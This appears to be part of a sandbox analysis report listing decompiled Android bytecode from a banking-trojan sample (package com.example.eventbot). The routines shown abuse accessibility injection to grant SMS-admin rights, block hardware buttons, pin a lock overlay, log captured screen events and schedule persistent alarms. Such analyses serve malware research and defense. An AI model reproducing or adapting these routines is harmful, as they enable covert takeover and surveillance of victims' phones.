                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [allowOptimizationsIgnoredRun] T:
                        • [func] [allowOptimizationsIgnoredRun] globalInjectResult:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2iget-object v0, p0, Lcom/lib$allowOptimizationsIgnoredRun;->this$0:Lcom/lib;
                        4iget-object v1, p0, Lcom/lib$allowOptimizationsIgnoredRun;->context:Landroid/content/Context;
                        6iget-object v2, p0, Lcom/lib$allowOptimizationsIgnoredRun;->inject:Ljava/lang/String;
                        7const/4 v3, -0x1
                        9invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v3
                        11const/4 v4, 0x0
                        13invoke-virtual {v0, v1, v2, v3, v4}, Lcom/lib;->startA11yInject(Landroid/content/Context;Ljava/lang/String;Ljava/lang/Integer;Z)Z
                        14move-result v0
                        15if-eqz v0, :cond_35
                        16goto_12: sget-boolean v0, Lcom/lib;->isA11yInjected:Z
                        17if-eqz v0, :cond_36
                        18const-wide/16 v0, 0x64
                        20invoke-static {v0, v1}, Ljava/lang/Thread;->sleep(J)V
                        21try_end_1b: goto/16 :goto_12
                        22catch_1c: move-exception v0
                        23try_start_1d:
                        24iget-object v1, p0, Lcom/lib$allowOptimizationsIgnoredRun;->this$0:Lcom/lib;
                        25new-instance v2, Ljava/lang/StringBuilder;
                        27invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        29const-string v3, "[func] [allowOptimizationsIgnoredRun] T: "
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        35move-result-object v0
                        37invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object v0
                        40invoke-virtual {v1, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        41try_end_35: return-void
                        42cond_36:
                        43iget-object v0, p0, Lcom/lib$allowOptimizationsIgnoredRun;->this$0:Lcom/lib;
                        44new-instance v1, Ljava/lang/StringBuilder;
                        46invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        48const-string v2, "[func] [allowOptimizationsIgnoredRun] globalInjectResult: "
                        50invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51move-result-object v1
                        52sget-boolean v2, Lcom/lib;->globalInjectResult:Z
                        54invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        55move-result-object v1
                        57invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        58move-result-object v1
                        60invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        61sget-boolean v0, Lcom/lib;->globalInjectResult:Z
                        62iput-boolean v0, p0, Lcom/lib$allowOptimizationsIgnoredRun;->result:Z
                        63try_end_54: goto/16 :goto_35
                        64catchall_55: move-exception v0
                        65throw v0
                        APIs
                        • java.lang.Integer.valueOf
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [allowSmsAdminRun] T:
                        • [func] [allowSmsAdminRun] globalInjectResult:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2iget-object v0, p0, Lcom/lib$allowSmsAdminRun;->this$0:Lcom/lib;
                        4iget-object v1, p0, Lcom/lib$allowSmsAdminRun;->context:Landroid/content/Context;
                        6iget-object v2, p0, Lcom/lib$allowSmsAdminRun;->inject:Ljava/lang/String;
                        7const/4 v3, -0x1
                        9invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        10move-result-object v3
                        11const/4 v4, 0x0
                        13invoke-virtual {v0, v1, v2, v3, v4}, Lcom/lib;->startA11yInject(Landroid/content/Context;Ljava/lang/String;Ljava/lang/Integer;Z)Z
                        14move-result v0
                        15if-eqz v0, :cond_35
                        16goto_12: sget-boolean v0, Lcom/lib;->isA11yInjected:Z
                        17if-eqz v0, :cond_36
                        18const-wide/16 v0, 0x64
                        20invoke-static {v0, v1}, Ljava/lang/Thread;->sleep(J)V
                        21try_end_1b: goto/16 :goto_12
                        22catch_1c: move-exception v0
                        23try_start_1d:
                        24iget-object v1, p0, Lcom/lib$allowSmsAdminRun;->this$0:Lcom/lib;
                        25new-instance v2, Ljava/lang/StringBuilder;
                        27invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        29const-string v3, "[func] [allowSmsAdminRun] T: "
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        35move-result-object v0
                        37invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object v0
                        40invoke-virtual {v1, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        41try_end_35: return-void
                        42cond_36:
                        43iget-object v0, p0, Lcom/lib$allowSmsAdminRun;->this$0:Lcom/lib;
                        44new-instance v1, Ljava/lang/StringBuilder;
                        46invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        48const-string v2, "[func] [allowSmsAdminRun] globalInjectResult: "
                        50invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        51move-result-object v1
                        52sget-boolean v2, Lcom/lib;->globalInjectResult:Z
                        54invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        55move-result-object v1
                        57invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        58move-result-object v1
                        60invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        61sget-boolean v0, Lcom/lib;->globalInjectResult:Z
                        62iput-boolean v0, p0, Lcom/lib$allowSmsAdminRun;->result:Z
                        63try_end_54: goto/16 :goto_35
                        64catchall_55: move-exception v0
                        65throw v0
                        Cross References
                        APIs
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        • java.lang.Long.longValue
                        • java.lang.Thread.join
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [allowSmsAdminRun] Start
                        • [func] [allowSmsAdminRun] result:
                        • [func] [allowSmsAdminRun] TimeOut
                        • [func] [allowSmsAdminRun] Error
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "[func] [allowSmsAdminRun] Start"
                        5invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        6new-instance v1, Lcom/lib$allowSmsAdminRun;
                        8invoke-direct {v1, p0, p1, p3}, Lcom/lib$allowSmsAdminRun;-><init>(Lcom/lib;Landroid/content/Context;Ljava/lang/String;)V
                        9new-instance v2, Ljava/lang/Thread;
                        11invoke-direct {v2, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        13invoke-virtual {v2}, Ljava/lang/Thread;->start()V
                        15invoke-virtual {p2}, Ljava/lang/Long;->longValue()J
                        16move-result-wide v4
                        17const-wide/16 v6, 0x3e8
                        18mul-long/2addr v4, v6
                        20invoke-virtual {v2, v4, v5}, Ljava/lang/Thread;->join(J)V
                        22invoke-virtual {v1}, Lcom/lib$allowSmsAdminRun;->getResult()Z
                        23move-result v0
                        25invoke-virtual {p0, p1}, Lcom/lib;->stopA11yInject(Landroid/content/Context;)V
                        26try_end_24: new-instance v1, Ljava/lang/StringBuilder;
                        28invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        30const-string v2, "[func] [allowSmsAdminRun] result: "
                        32invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33move-result-object v1
                        35invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        36move-result-object v1
                        38invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v1
                        41invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        42return v0
                        43catch_3b: move-exception v1
                        44instance-of v1, v1, Ljava/lang/InterruptedException;
                        45if-eqz v1, :cond_46
                        47const-string v1, "[func] [allowSmsAdminRun] TimeOut"
                        49invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        50goto/16 :goto_24
                        51cond_46:
                        52const-string v1, "[func] [allowSmsAdminRun] Error"
                        54invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        55goto/16 :goto_24
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.toString
                        Strings
                        • debug
                        • aInjDebug
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        3move-result-object v0
                        5invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        6move-result-object v0
                        8invoke-virtual {p2, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        9move-result-object v0
                        11const-string v1, "debug"
                        13invoke-virtual {v0, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        14move-result v0
                        15if-nez v0, :cond_42
                        17invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        18move-result-object v0
                        20invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        21move-result-object v0
                        23invoke-virtual {p2, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        24move-result-object v0
                        26const-string v1, "debug"
                        28invoke-virtual {v0, v1}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        29move-result v0
                        30if-eqz v0, :cond_42
                        32invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        33move-result-object v0
                        35invoke-virtual {v0}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        36move-result-object v0
                        38invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        40iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        42const-string v1, "aInjDebug"
                        44invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        45move-result-object v2
                        47invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        48move-result-object v2
                        50invoke-virtual {p0, v0, v1, v2}, Lcom/lib;->sendLogThread(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
                        51goto_42: return-void
                        52catch_43: move-exception v0
                        53goto/16 :goto_42
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.edit
                        • android.content.SharedPreferences$Editor.putBoolean
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.putString
                        • android.content.SharedPreferences$Editor.commit
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • lockPinned
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11invoke-interface {v1}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
                        12move-result-object v1
                        14const-string v2, "lockPinned"
                        15const/4 v3, 0x1
                        17invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences$Editor;->putBoolean(Ljava/lang/String;Z)Landroid/content/SharedPreferences$Editor;
                        19sget-object v2, Lcom/lib;->STRINGS_HTML:Ljava/lang/String;
                        21invoke-interface {v1, v2, p3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
                        23sget-object v2, Lcom/lib;->STRINGS_BG:Ljava/lang/String;
                        25invoke-interface {v1, v2, p4}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
                        27invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->commit()Z
                        28try_end_22: move-result v0
                        29try_start_23:
                        30sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        32invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        33goto_28: return v0
                        34catch_29: move-exception v1
                        36sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        38invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        39goto/16 :goto_28
                        40catch_30: move-exception v1
                        41goto/16 :goto_28
                        42catchall_32: move-exception v1
                        44sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        46invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        47throw v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [makeScrollDown] element:
                        • [makeScrollDown] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v1
                        5if-eqz v1, :cond_23
                        6new-instance v2, Ljava/lang/StringBuilder;
                        8invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        10const-string v3, "[makeScrollDown] element: "
                        12invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v2
                        15invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        16move-result-object v2
                        18invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v2
                        21invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        22const/16 v2, 0x1000
                        24invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        25try_end_22: move-result v0
                        26goto_23: return v0
                        27catch_24: move-exception v1
                        28new-instance v2, Ljava/lang/StringBuilder;
                        30invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        32const-string v3, "[makeScrollDown] T: "
                        34invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35move-result-object v2
                        37invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        38move-result-object v1
                        40invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        41move-result-object v1
                        43invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        44goto/16 :goto_23
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [makeScrollUp] element:
                        • [makeScrollUp] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v1
                        5if-eqz v1, :cond_23
                        6new-instance v2, Ljava/lang/StringBuilder;
                        8invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        10const-string v3, "[makeScrollUp] element: "
                        12invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        13move-result-object v2
                        15invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        16move-result-object v2
                        18invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v2
                        21invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        22const/16 v2, 0x2000
                        24invoke-virtual {v1, v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(I)Z
                        25try_end_22: move-result v0
                        26goto_23: return v0
                        27catch_24: move-exception v1
                        28new-instance v2, Ljava/lang/StringBuilder;
                        30invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        32const-string v3, "[makeScrollUp] T: "
                        34invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35move-result-object v2
                        37invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        38move-result-object v1
                        40invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        41move-result-object v1
                        43invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        44goto/16 :goto_23
                        APIs
                        • android.app.Service.onCreate
                        • android.os.Handler.<init>
                        • com.example.eventbot.service.loadLib
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.d
                        • android.util.Log.d
                        Strings
                        • [service] [func] [newInstance] T:
                        • [func] [service] onCreate
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onCreate()V
                        2new-instance v0, Landroid/os/Handler;
                        4invoke-direct {v0}, Landroid/os/Handler;-><init>()V
                        5iput-object v0, p0, Lcom/example/eventbot/service;->handler:Landroid/os/Handler;
                        6const/4 v0, 0x1
                        7try_start_b:
                        8invoke-virtual {p0, p0, v0, v0}, Lcom/example/eventbot/service;->loadLib(Landroid/content/Context;IZ)Lcom/libInterface;
                        9move-result-object v0
                        10sput-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        11try_end_11: goto/16 :goto_29
                        12catchall_12: move-exception v0
                        14sget-object v1, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        15new-instance v2, Ljava/lang/StringBuilder;
                        17invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        19const-string v3, "[service] [func] [newInstance] T: "
                        21invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        23invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        25invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        26move-result-object v0
                        28invoke-static {v1, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        29goto_29:
                        30sget-object v0, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        32const-string v1, "[func] [service] onCreate"
                        34invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        35return-void
                        APIs
                        • android.content.Context.getSystemService
                        • android.content.Intent.<init>
                        • android.app.PendingIntent.getBroadcast
                        • java.lang.System.currentTimeMillis
                        • java.lang.Long.longValue
                        • android.app.AlarmManager.setExactAndAllowWhileIdle
                        • java.lang.System.currentTimeMillis
                        • java.lang.Long.longValue
                        • android.app.AlarmManager.setExact
                        Strings
                        • alarm
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4"Ljava/lang/Class",
                        5"<*>;",
                        6"Ljava/lang/Long;",
                        7")Z"
                        8}
                        9.end annotation
                        10.prologue
                        11const-wide/16 v8, 0x3e8
                        12const/4 v6, 0x0
                        14const-string v0, "alarm"
                        16invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        17move-result-object v0
                        18check-cast v0, Landroid/app/AlarmManager;
                        19if-eqz v0, :cond_29
                        20new-instance v1, Landroid/content/Intent;
                        22invoke-direct {v1, p1, p2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        24invoke-static {p1, v6, v1, v6}, Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
                        25move-result-object v1
                        26sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
                        27const/16 v3, 0x17
                        28if-lt v2, v3, :cond_2a
                        30invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        31move-result-wide v2
                        33invoke-virtual {p3}, Ljava/lang/Long;->longValue()J
                        34move-result-wide v4
                        35mul-long/2addr v4, v8
                        36add-long/2addr v2, v4
                        38invoke-virtual {v0, v6, v2, v3, v1}, Landroid/app/AlarmManager;->setExactAndAllowWhileIdle(IJLandroid/app/PendingIntent;)V
                        39cond_29: return v6
                        40cond_2a:
                        41invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        42move-result-wide v2
                        44invoke-virtual {p3}, Ljava/lang/Long;->longValue()J
                        45move-result-wide v4
                        46mul-long/2addr v4, v8
                        47add-long/2addr v2, v4
                        49invoke-virtual {v0, v6, v2, v3, v1}, Landroid/app/AlarmManager;->setExact(IJLandroid/app/PendingIntent;)V
                        50goto/16 :goto_29
                        APIs
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.acquire
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • android.accessibilityservice.AccessibilityService.onKeyEvent
                        • android.accessibilityservice.AccessibilityService.onKeyEvent
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.events.onAccessibilityEventFired:Ljava/util/concurrent/Semaphore
                        • java.util.concurrent.Semaphore.release
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [bot] [access] onAccessibilityEventFired:
                        Position Instruction Meta Information
                        0const/4 v0, 0x1
                        1try_start_1:
                        2sget-object v1, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        4invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        5try_start_6:
                        6sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        7if-eqz v1, :cond_17
                        9sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        11invoke-interface {v1, p1}, Lcom/libInterface;->BlockHardwareButtons(Landroid/view/KeyEvent;)Z
                        12move-result v1
                        13if-nez v1, :cond_1b
                        15invoke-super {p0, p1}, Landroid/accessibilityservice/AccessibilityService;->onKeyEvent(Landroid/view/KeyEvent;)Z
                        16move-result v0
                        17goto/16 :goto_1b
                        18cond_17:
                        19invoke-super {p0, p1}, Landroid/accessibilityservice/AccessibilityService;->onKeyEvent(Landroid/view/KeyEvent;)Z
                        20move-result v0
                        21try_start_1b:
                        22sget-object p1, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        24invoke-virtual {p1}, Ljava/util/concurrent/Semaphore;->release()V
                        25goto/16 :goto_3f
                        26catchall_21: move-exception p1
                        28sget-object v1, Lcom/example/eventbot/events;->onAccessibilityEventFired:Ljava/util/concurrent/Semaphore;
                        30invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        31throw p1
                        32try_end_28: move-exception p1
                        34sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        35new-instance v2, Ljava/lang/StringBuilder;
                        37invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        39const-string v3, "[bot] [access] onAccessibilityEventFired: "
                        41invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        45invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        46move-result-object p1
                        48invoke-interface {v1, p1}, Lcom/libInterface;->printDebug(Ljava/lang/String;)V
                        49goto_3f: return v0
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.names
                        • org.json.JSONArray.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] startApp
                        • [func] startApp after checkAccess
                        • [func] startApp T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        3const-string v1, "[func] startApp"
                        5invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        7iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        9invoke-virtual {p0, p1, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        10move-result v1
                        11if-nez v1, :cond_f
                        12goto_e: return v0
                        13cond_f:
                        14const-string v1, "[func] startApp after checkAccess"
                        16invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        17try_start_14: new-instance v1, Lorg/json/JSONObject;
                        19sget-object v2, Lcom/lib;->injectJSON:Ljava/lang/String;
                        21invoke-direct {v1, v2}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        23invoke-virtual {v1}, Lorg/json/JSONObject;->names()Lorg/json/JSONArray;
                        24move-result-object v1
                        26invoke-virtual {v1, p2}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
                        27move-result-object v1
                        29invoke-virtual {p0, p1, v1}, Lcom/lib;->startApp(Landroid/content/Context;Ljava/lang/String;)Z
                        30try_end_26: move-result v0
                        31goto/16 :goto_e
                        32catch_28: move-exception v1
                        33new-instance v2, Ljava/lang/StringBuilder;
                        35invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        37const-string v3, "[func] startApp T: "
                        39invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        40move-result-object v2
                        42invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        43move-result-object v1
                        45invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        46move-result-object v1
                        48invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        49goto/16 :goto_e
                        Cross References
                        APIs
                        • java.lang.String.length
                        • java.lang.String.length
                        • java.lang.String.length
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.content.Intent.putExtra
                        • android.content.Intent.putExtra
                        • android.content.Context.startActivity
                        Strings
                        • mode
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v4, 0x7
                        2const/4 v0, 0x1
                        3const/4 v1, 0x0
                        4if-eqz p2, :cond_1c
                        5if-eqz p3, :cond_1c
                        7invoke-virtual {p2}, Ljava/lang/String;->length()I
                        8move-result v2
